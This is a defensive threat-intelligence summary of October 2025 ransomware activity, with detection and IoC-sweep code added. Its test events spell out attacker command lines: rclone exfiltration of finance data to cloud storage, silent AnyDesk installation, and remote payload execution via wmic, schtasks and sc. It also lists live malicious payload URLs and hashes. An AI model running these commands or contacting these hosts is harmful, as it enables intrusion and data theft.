October 2025 Attacks Soar 30% as New Groups Redefine the Cyber Battlefield

Ransomware attacks surged to 623 incidents in October 2025, the second-highest monthly total on record, driven by groups such as Qilin, Akira, Sinobi, Medusa, Cl0p, Warlock, BlackSuit, The Gentlemen, and others. Key exploited vulnerabilities and tactics included CVE-2025-61882 (Oracle E-Business Suite), CVE-2025-10035 (GoAnywhere), deserialization RCEs, abuse of legitimate remote management tools, and supply-chain targeting. #Qilin #Sinobi

Keypoints

  • October 2025 saw 623 ransomware attacks, a >30% month-over-month increase and the sixth consecutive monthly rise.
  • Qilin was the most active group with 210 claimed victims, followed by Akira and the rapidly rising Sinobi (69 victims).
  • Critical sectors targeted included Construction, Professional Services, Healthcare, Manufacturing, IT, and Energy/Utilities, with 31 incidents potentially impacting critical infrastructure and 26 with supply-chain implications.
  • Multiple high-profile vulnerabilities were weaponized, including CVE-2025-61882 (Oracle E-Business Suite) and CVE-2025-10035 (GoAnywhere), plus several CISA-noted CVEs and kernel flaws.
  • Attack techniques frequently involved exploitation of unpatched internet-facing assets, credential theft, abuse or silent installation of legitimate remote-access/RMM tools, web shells, and data exfiltration with Rclone or cloud clients such as Cyberduck to cloud storage (e.g., Backblaze).
  • Notable actor behaviors: Cl0p leveraged the Oracle E-Business Suite SSRF/XSL RCE chain for data theft, Medusa chained the GoAnywhere deserialization RCE to deploy RMM-based persistence and Rclone exfiltration, and Qilin abused remote-management tools and BYOVD (bring-your-own-vulnerable-driver) to deploy cross-platform payloads.
  • Recommendations emphasized vulnerability prioritization, protecting web-facing assets, segmentation, hardening, strong access controls and authentication, immutable backups, and monitoring/assessments.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Used to gain initial access via vulnerabilities such as “CVE-2025-61882” and “CVE-2025-10035” (“Cl0p exploited a critical vulnerability (CVE-2025-61882) in Oracle E-Business Suite…”; “Medusa chained an unauthenticated deserialization RCE in GoAnywhere MFT (CVE-2025-10035) to gain initial access”).
  • [T1021.001] Remote Services: Remote Desktop Protocol – Lateral movement over RDP after an exposed MS-SQL server served as the entry point; the brute-force itself maps to T1110 below (e.g., “Trigona ransomware operators brute-forced exposed MS-SQL servers… moved laterally using mstsc.exe (RDP)”).
  • [T1078] Valid Accounts / [T1566.004] Spearphishing Voice – Credential theft and vishing for VPN credentials, then use of the stolen credentials to reach remote-access tools (“Recent BlackSuit campaigns employed Vishing to steal VPN credentials…”).
  • [T1219] Remote Access Software – Abuse and silent installation of legitimate remote-access tools such as AnyDesk, RustDesk and Splashtop for persistence and lateral movement (“ransomware operators are increasingly hijacking or silently installing legitimate remote access tools…”).
  • [T1059] Command and Scripting Interpreter / [T1047] Windows Management Instrumentation / [T1053.005] Scheduled Task – Use of PowerShell Remoting, SCHTASKS, SC, and WMI for self-spread and lateral actions (“self-spread capabilities across networks/domains using WMI/WMIC, SCHTASKS, SC (Service Control) and PowerShell Remoting”).
  • [T1105] Ingress Tool Transfer / [T1505.003] Server Software Component: Web Shell – Dropping RMM binaries as children of the legitimate application process and placing .jsp web shells in application directories (“dropping RMM binaries directly under the GoAnywhere process and creating .jsp web shells in MFT directories”).
  • [T1567.002] Exfiltration to Cloud Storage – Data theft via Rclone and cloud clients performing multipart uploads to Backblaze; these go to commodity cloud storage rather than over the C2 channel (“Data theft was performed with Rclone… exfiltrate data via abused cloud tools like Cyberduck (multipart uploads to Backblaze)”).
  • [T1562.001] Impair Defenses: Disable or Modify Tools / [T1484.001] Domain Policy Modification: Group Policy Modification – Installation of an outdated Velociraptor agent (a legitimate DFIR tool repurposed as a remote-access foothold) together with GPO changes to disable defenses and maintain persistence (“Warlock operators installed an outdated version of the open-source Velociraptor… used it alongside a pre-existing vulnerability (CVE-2025-6264) and GPO modifications to disable defenses”).
  • [T1486] Data Encrypted for Impact – Mass deployment of ransomware across ESXi hosts and encryption of VMs causing major disruption (“using Ansible to deploy BlackSuit ransomware across ESXi hosts, encrypting hundreds of VMs and causing major operational disruption”).
  • [T1110] Brute Force – Brute-force of exposed services (MS-SQL) and credential stuffing to gain initial access (“Trigona ransomware operators brute-forced exposed MS-SQL servers”).
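The behaviors in the list above (an RMM agent spawned by the GoAnywhere process, a .jsp web shell in an MFT directory, Rclone pushing data to a cloud remote, and WMIC/SCHTASKS/SC/PowerShell-Remoting self-spread) are the kind of thing a SOC turns into process- and file-event detections. The following is an added example, not code from Cyble's report: the events are constructed, loosely shaped like Sysmon process-create (EID 1) and file-create (EID 11) records after SIEM normalization, and the field names, RMM executable names and GoAnywhere path hint are assumptions to adapt to your own telemetry.

```python
"""Behavioural detections for the TTPs summarised above (added example)."""
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# RMM agents the report names (AnyDesk, RustDesk, Splashtop); the executable
# names are assumed. Remove any tool your fleet legitimately runs.
RMM_BINARIES = {"anydesk.exe", "rustdesk.exe", "srserver.exe"}
MFT_HINT = "goanywhere"  # substring identifying the MFT install path / JVM

def _base(path: str) -> str:
    return ntpath.basename(path).lower()

def detect(ev: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (ATT&CK technique, description) for one event, or None if benign."""
    if ev["type"] == "file":
        p = ev["path"].lower()
        if p.endswith((".jsp", ".jspx")) and ("webapps" in p or MFT_HINT in p):
            return ("T1505.003", "JSP web shell written into MFT web directory")
        return None

    img, parent, cmd = _base(ev["image"]), ev["parent"].lower(), ev["cmdline"]
    # Medusa pattern: the MFT application's JVM spawns a remote-access agent.
    if MFT_HINT in parent and img in RMM_BINARIES:
        return ("T1219", f"{img} launched by GoAnywhere process")
    # Rclone copy/sync/move to a named remote ('b2:bucket'); a single-letter
    # drive target such as D: is deliberately not counted as a remote.
    if img == "rclone.exe" and re.search(r"\b(copy|sync|move)\b.*\s[\w-]{2,}:", cmd):
        return ("T1567.002", "rclone transfer to cloud remote")
    # Self-spread primitives aimed at another host.
    if img == "wmic.exe" and re.search(r"/node:", cmd, re.I):
        return ("T1047", "WMIC remote process creation")
    if img == "schtasks.exe" and re.search(r"/create", cmd, re.I) and re.search(r"/s\s+\S+", cmd, re.I):
        return ("T1053.005", "scheduled task created on remote host")
    if img == "sc.exe" and re.search(r"\\\\\S+\s+create\b", cmd, re.I):
        return ("T1543.003", "service created on remote host")
    if img in {"powershell.exe", "pwsh.exe"} and re.search(r"invoke-command|enter-pssession|-computername", cmd, re.I):
        return ("T1021.006", "PowerShell Remoting to another host")
    return None

# Constructed telemetry (not from the report): six malicious events, two benign.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "host": "mft01", "parent": r"C:\Program Files\HelpSystems\GoAnywhere\jre\bin\java.exe",
     "image": r"C:\Windows\Temp\AnyDesk.exe", "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --silent"},
    {"type": "file", "host": "mft01",
     "path": r"C:\Program Files\HelpSystems\GoAnywhere\tomcat\webapps\ROOT\help.jsp"},
    {"type": "process", "host": "fs02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\rclone.exe", "cmdline": r"rclone.exe copy D:\Finance b2:corp-backup --transfers 16 -q"},
    {"type": "process", "host": "fs02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe", "cmdline": r'wmic /node:FS03 process call create "cmd /c \\FS03\c$\upd.exe"'},
    {"type": "process", "host": "fs02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /s FS04 /tn Update /tr C:\Windows\Temp\upd.exe /sc once /st 00:00 /ru SYSTEM"},
    {"type": "process", "host": "fs02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\sc.exe", "cmdline": r"sc \\FS05 create upd binPath= C:\Windows\Temp\upd.exe"},
    {"type": "process", "host": "ws17", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe", "cmdline": "schtasks /query /tn Update"},
    {"type": "process", "host": "mft01", "parent": r"C:\Program Files\HelpSystems\GoAnywhere\jre\bin\java.exe",
     "image": r"C:\Program Files\HelpSystems\GoAnywhere\jre\bin\java.exe", "cmdline": "java.exe -jar worker.jar"},
]

def evaluate(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every event through detect() and collect the hits in order."""
    hits = []
    for ev in events:
        found = detect(ev)
        if found:
            hits.append({"host": ev["host"], "technique": found[0], "detail": found[1]})
    return hits

if __name__ == "__main__":
    for h in evaluate(SAMPLE_EVENTS):
        print(f"{h['host']:6} {h['technique']:10} {h['detail']}")
```

The parent-process rule is the most durable of these: whatever the RMM agent is renamed to, an MFT server's JVM has no business spawning an interactive remote-access installer, so tuning the parent hint to the process that fronts your own internet-facing application gives a low-noise detection for the post-exploitation step rather than for one CVE.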

Indicators of Compromise

  • [FileHash-SHA256] Qilin-related malware hashes – 15E5BF0082FBB1036D39FC279293F0799F2AB5B2B0AF47D9F3C3FDC4AA93DE67, 16F83F056177C4EC24C7E99D01CA9D9D6713BD0497EEEDB777A3FFEFA99C97F0, and multiple other hashes (and 10 more hashes).
  • [URL] Malicious/hosted payloads and command channels – hxxp://104.164.55.7/231/means.d, hxxp://185.141.216.127/tr.e, hxxp://45.221.64.245/mot/, and malicious cloud-hosted pages such as hxxps://pub-2149a070e76f4ccabd67228f754768dc.r2[.]dev/I-Google-Captcha-Continue-Latest-27-L-1.html.
  • [Domain] Malicious look-alike domains – hxxps://chatgptitalia[.]net used to host fake installers and lure victims (Vanilla Tempest campaign delivering fake Microsoft Teams installers).
  • [FileHash-SHA256] Additional Qilin sample hash – 31C3574456573C89D444478772597DB40F075E25C67B8DE39926D2FAA63CA1D8 (appendix list of Qilin IoCs).
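The IoCs above are defanged inconsistently (hxxp everywhere, but [.] only in some hostnames), so they need normalizing before they can be swept against proxy or EDR logs. The following is an added example, not code from Cyble's report: the IoC text is copied from the list above (the hashes elided there stay elided), while the key=value log lines are constructed and their layout is an assumption.

```python
"""Refang the IoCs listed above and sweep them against log lines (added example)."""
import re
from urllib.parse import urlsplit

# Copied from the IoC section above, still defanged.
DEFANGED_IOCS = """
15E5BF0082FBB1036D39FC279293F0799F2AB5B2B0AF47D9F3C3FDC4AA93DE67
16F83F056177C4EC24C7E99D01CA9D9D6713BD0497EEEDB777A3FFEFA99C97F0
31C3574456573C89D444478772597DB40F075E25C67B8DE39926D2FAA63CA1D8
hxxp://104.164.55.7/231/means.d
hxxp://185.141.216.127/tr.e
hxxp://45.221.64.245/mot/
hxxps://pub-2149a070e76f4ccabd67228f754768dc.r2[.]dev/I-Google-Captcha-Continue-Latest-27-L-1.html
hxxps://chatgptitalia[.]net
"""

def refang(token: str) -> str:
    """Undo the common defanging conventions (hxxp, [.], [:])."""
    return token.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")

def load_iocs(text: str) -> dict:
    """Split IoC text into hash / exact-URL / host sets, refanged and normalised."""
    iocs = {"sha256": set(), "url": set(), "host": set()}
    for tok in text.split():
        tok = refang(tok)
        if re.fullmatch(r"[0-9a-f]{64}", tok, re.I):
            iocs["sha256"].add(tok.lower())
        elif tok.startswith(("http://", "https://")):
            iocs["url"].add(tok.rstrip("/"))          # exact URL, trailing-slash insensitive
            iocs["host"].add(urlsplit(tok).hostname)  # weaker host-level match
    return iocs

# Constructed log lines (web proxy and EDR); not from the report.
SAMPLE_LOGS = [
    "ts=2025-10-14T09:12:03Z src=10.0.4.21 url=http://185.141.216.127/tr.e status=200",
    "ts=2025-10-14T09:15:41Z src=10.0.4.33 url=https://chatgptitalia.net/dl/TeamsSetup.exe status=200",
    "ts=2025-10-14T09:16:02Z src=10.0.4.40 url=https://www.microsoft.com/en-us/microsoft-teams status=200",
    r"ts=2025-10-14T09:20:19Z src=WS-117 event=file_write sha256=15e5bf0082fbb1036d39fc279293f0799f2ab5b2b0af47d9f3c3fdc4aa93de67 path=C:\Users\Public\x.exe",
    "ts=2025-10-14T09:22:55Z src=10.0.4.33 url=http://45.221.64.245/mot/ status=404",
]
KV = re.compile(r"(\w+)=(\S+)")

def scan(lines, iocs):
    """Return (src, match_type, value) for every line touching a known IoC."""
    hits = []
    for line in lines:
        fields = dict(KV.findall(line))
        url = fields.get("url")
        if url:
            host = urlsplit(url).hostname
            if url.rstrip("/") in iocs["url"]:
                hits.append((fields.get("src"), "url", url))
            elif host in iocs["host"]:
                hits.append((fields.get("src"), "host", host))
        digest = fields.get("sha256", "").lower()
        if digest in iocs["sha256"]:
            hits.append((fields.get("src"), "sha256", digest))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS, load_iocs(DEFANGED_IOCS)):
        print(hit)
```

Keeping exact-URL and host-level matches separate matters for triage: the chatgptitalia[.]net lure host is a strong signal on its own, whereas a host-only hit on a shared cloud bucket domain such as r2.dev would need the full path to mean anything, which is why the r2.dev entry is only ever matched as a complete URL here.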


Read more: https://cyble.com/blog/ransomware-attacks-surge-october-2025/